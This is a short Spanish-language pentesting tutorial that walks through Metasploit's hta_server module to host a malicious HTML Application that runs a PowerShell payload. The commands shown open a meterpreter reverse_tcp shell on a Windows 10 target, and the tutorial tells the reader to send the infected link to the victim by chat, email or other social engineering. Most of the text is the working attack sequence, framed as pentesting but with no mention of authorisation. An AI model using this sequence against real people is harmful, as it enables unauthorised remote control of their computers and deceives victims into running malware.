Este módulo aloja una HTML Application (HTA) que, cuando se abre, ejecutará una payload (carga útil) a través de Powershell. Cuando un usuario navega hacia el archivo HTA, Windows te alertará dos veces antes de que se ejecute la carga útil
Objetivos de explotación
- Windows Todas las versiones
- Pentester: Parrot OS (Puedes usar Kali Linux u otra de las 5 mejores distros Linux para pruebas de seguridad)
- Objetivo: Windows 10
Pentesting con HTA Web Server
- Abre el terminal e inicia el Metasploit Framework (MSF):
msfconsole
- Creamos la payload con los siguientes comandos:
use exploit/windows/misc/hta_server
set lhost <tu_IP>
set srvhost <tu_IP>
set payload windows/meterpreter/reverse_tcp
set lport 8443
exploit
Para conocer tu IP abre una nueva terminal y ejecuta el comando ifconfig
.
- Lo hecho anteriormente creará un URL con el archivo infeccioso. Envía el enlace del servidor al objetivo por chat o correo electrónico o cualquier técnica de ingeniería social.
- Cuando el ordenador objetivo navegue hacía tu enlace, descargará un archivo del tipo
abcxyz.hta
, y cuando el objetivo haga clic en él obtendrás la sesión de meterpreter.
- Ahora tienes acceso a la PC del objetivo. Utiliza el comando “
sessions -i
” y el número de sesión para conectarte a la sesión.